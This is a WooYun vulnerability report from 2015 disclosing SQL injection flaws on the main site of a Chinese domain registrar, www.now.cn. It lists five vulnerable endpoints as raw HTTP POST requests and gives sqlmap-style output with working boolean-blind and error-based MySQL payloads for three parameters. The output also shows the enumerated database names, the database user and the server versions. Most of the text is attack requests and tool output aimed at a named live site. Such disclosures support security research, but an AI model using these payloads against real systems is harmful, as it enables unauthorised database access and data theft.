当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0128998

漏洞标题:域名服务商之时代互联主站存在SQL注射漏洞

相关厂商:广东时代互联科技有限公司

漏洞作者: 路人甲

提交时间:2015-07-24 17:08

修复时间:2015-07-29 17:10

公开时间:2015-07-29 17:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-24: 细节已通知厂商并且等待厂商处理中
2015-07-29: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

1,
POST /whois/nowcheck.net HTTP/1.1
Content-Length: 1084
Content-Type: application/x-www-form-urlencoded
Referer: www.now.cn
Cookie: 
Host: www.now.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36
Accept: */*
Submit2=%e6%9f%a5%20%e8%af%a2&domain%5b%5d=.me&domain%5b%5d=1&domain%5b%5d=.cm&domain%5b%5d=.jp&domain%5b%5d=.de&domain%5b%5d=.co&domain%5b%5d=.ag&domain%5b%5d=.mn&domain%5b%5d=.bz&domain%5b%5d=.la&domain%5b%5d=.hn&domain%5b%5d=.asia&domain%5b%5d=.jobs&domain%5b%5d=.kr&domain%5b%5d=.wiki&domain%5b%5d=.ceo&domain%5b%5d=.wang&domain%5b%5d=.xyz&domain%5b%5d=.website&domain%5b%5d=.top&domain%5b%5d=.club&domain%5b%5d=.uk.com&domain%5b%5d=.us.com&domain%5b%5d=.co.uk&domain%5b%5d=.it&domain%5b%5d=.cn.com&domain%5b%5d=.pw&domain%5b%5d=.fr&domain%5b%5d=.sc&domain%5b%5d=.gov.cn&domain%5b%5d=.org.cn&domain%5b%5d=.net.cn&domain%5b%5d=.tw&domain%5b%5d=.com.hk&domain%5b%5d=.hk&domain%5b%5d=.com.cn&domain%5b%5d=.org&domain%5b%5d=.net&domain%5b%5d=.com&domain%5b%5d=.cn&domain%5b%5d=.name&domain%5b%5d=.info&domain%5b%5d=.com.tw&domain%5b%5d=.cc&domain%5b%5d=.tm&domain%5b%5d=.us&domain%5b%5d=.vc&domain%5b%5d=.in&domain%5b%5d=.tv&domain%5b%5d=.mobi&domain%5b%5d=.ac&domain%5b%5d=.travel&domain%5b%5d=.sh&domain%5b%5d=.biz&domain%5b%5d=.ws&domain%5b%5d=.io&domain_selAll=on&query=1
2,
POST /mobile-admin/ HTTP/1.1
Content-Length: 69
Content-Type: application/x-www-form-urlencoded
Referer: www.now.cn
Cookie: 
Host: www.now.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36
Accept: */*
button=%e5%85%a8%e9%83%a8%e5%88%97%e5%87%ba&keyword=1&selStatus=1
3,
POST /domain-admin/domain_list.net?action=addToFolder HTTP/1.1
Content-Length: 126
Content-Type: application/x-www-form-urlencoded
Referer: www.now.cn
Cookie: 
Host: www.now.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36
Accept: */*
Submit2=%e7%a1%ae%e5%ae%9a&action=addAllToFolder&backURL=domain_list.net&Canecl=%e5%8f%96%e6%b6%88&domains=&FolderSelect=1
4,
www.now.cn/email-admin/Manager.net?IDEmail=%
5,
POST /mobile-admin/remind_submit.net?IDSMSUser=102366 HTTP/1.1
Content-Length: 59
Content-Type: application/x-www-form-urlencoded
Referer: www.now.cn
Cookie: 
Host: www.now.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36
Accept: */*
Submit=%e8%ae%be%20%e7%bd%ae&AdminMobile=1&WarnLine=500

漏洞证明:

每个注入点跑出来的库不一样,猜测是做了防护。
---
Parameter: domain[] (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: Submit2=%e6%9f%a5 %e8%af%a2&domain[]=.me&domain[]=1&domain[]=.cm&domain[]=.jp&domain[]=.de&domain[]=.co&domain[]=.ag&domain[]=.mn&domain[]=.bz&domain[]=.la&domain[]=.hn&domain[]=.asia&domain[]=.jobs&domain[]=.kr&domain[]=.wiki&domain[]=.ceo&domain[]=.wang&domain[]=.xyz&domain[]=.website&domain[]=.top&domain[]=.club&domain[]=.uk.com&domain[]=.us.com&domain[]=.co.uk&domain[]=.it&domain[]=.cn.com&domain[]=.pw&domain[]=.fr&domain[]=.sc&domain[]=.gov.cn&domain[]=.org.cn&domain[]=.net.cn&domain[]=.tw&domain[]=.com.hk&domain[]=.hk&domain[]=.com.cn&domain[]=.org&domain[]=.net&domain[]=.com&domain[]=.cn&domain[]=.name&domain[]=.info&domain[]=.com.tw&domain[]=.cc&domain[]=.tm&domain[]=.us&domain[]=.vc&domain[]=.in&domain[]=.tv&domain[]=.mobi&domain[]=.ac&domain[]=.travel&domain[]=.sh&domain[]=.biz&domain[]=.ws&domain[]=.io' RLIKE (SELECT (CASE WHEN (3296=3296) THEN 0x2e696f ELSE 0x28 END)) AND 'MtTW'='MtTW&domain_selAll=on&query=1
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: Submit2=%e6%9f%a5 %e8%af%a2&domain[]=.me&domain[]=1&domain[]=.cm&domain[]=.jp&domain[]=.de&domain[]=.co&domain[]=.ag&domain[]=.mn&domain[]=.bz&domain[]=.la&domain[]=.hn&domain[]=.asia&domain[]=.jobs&domain[]=.kr&domain[]=.wiki&domain[]=.ceo&domain[]=.wang&domain[]=.xyz&domain[]=.website&domain[]=.top&domain[]=.club&domain[]=.uk.com&domain[]=.us.com&domain[]=.co.uk&domain[]=.it&domain[]=.cn.com&domain[]=.pw&domain[]=.fr&domain[]=.sc&domain[]=.gov.cn&domain[]=.org.cn&domain[]=.net.cn&domain[]=.tw&domain[]=.com.hk&domain[]=.hk&domain[]=.com.cn&domain[]=.org&domain[]=.net&domain[]=.com&domain[]=.cn&domain[]=.name&domain[]=.info&domain[]=.com.tw&domain[]=.cc&domain[]=.tm&domain[]=.us&domain[]=.vc&domain[]=.in&domain[]=.tv&domain[]=.mobi&domain[]=.ac&domain[]=.travel&domain[]=.sh&domain[]=.biz&domain[]=.ws&domain[]=.io' AND EXTRACTVALUE(9934,CONCAT(0x5c,0x716a767171,(SELECT (ELT(9934=9934,1))),0x71716b7071)) AND 'IGIm'='IGIm&domain_selAll=on&query=1
---
web application technology: Apache, PHP 5.5.18
back-end DBMS: MySQL 5.1
current user:    'nownetcn@10.0.%'
current user is DBA:    False
available databases [1]:
[*] db_now_net_cn
---
Parameter: keyword (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: button=%e5%85%a8%e9%83%a8%e5%88%97%e5%87%ba&keyword=1') RLIKE (SELECT (CASE WHEN (5495=5495) THEN 1 ELSE 0x28 END)) AND ('eUov'='eUov&selStatus=1
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: button=%e5%85%a8%e9%83%a8%e5%88%97%e5%87%ba&keyword=1') AND EXTRACTVALUE(2235,CONCAT(0x5c,0x7176767a71,(SELECT (ELT(2235=2235,1))),0x71626b6271)) AND ('yKpo'='yKpo&selStatus=1
---
web application technology: Apache, PHP 5.5.18
back-end DBMS: MySQL 5
available databases [1]:
[*] Mobile
---
Parameter: FolderSelect (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: Submit2=%e7%a1%ae%e5%ae%9a&action=addAllToFolder&backURL=domain_list.net&Canecl=%e5%8f%96%e6%b6%88&domains=&FolderSelect=1' RLIKE (SELECT (CASE WHEN (6567=6567) THEN 1 ELSE 0x28 END)) AND 'tbEf'='tbEf
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: Submit2=%e7%a1%ae%e5%ae%9a&action=addAllToFolder&backURL=domain_list.net&Canecl=%e5%8f%96%e6%b6%88&domains=&FolderSelect=1' AND EXTRACTVALUE(9795,CONCAT(0x5c,0x71766a6b71,(SELECT (ELT(9795=9795,1))),0x71786b7a71)) AND 'YXqm'='YXqm
---
web application technology: Apache, PHP 5.5.18
back-end DBMS: MySQL 5.1

修复方案:

fix

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-07-29 17:10

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无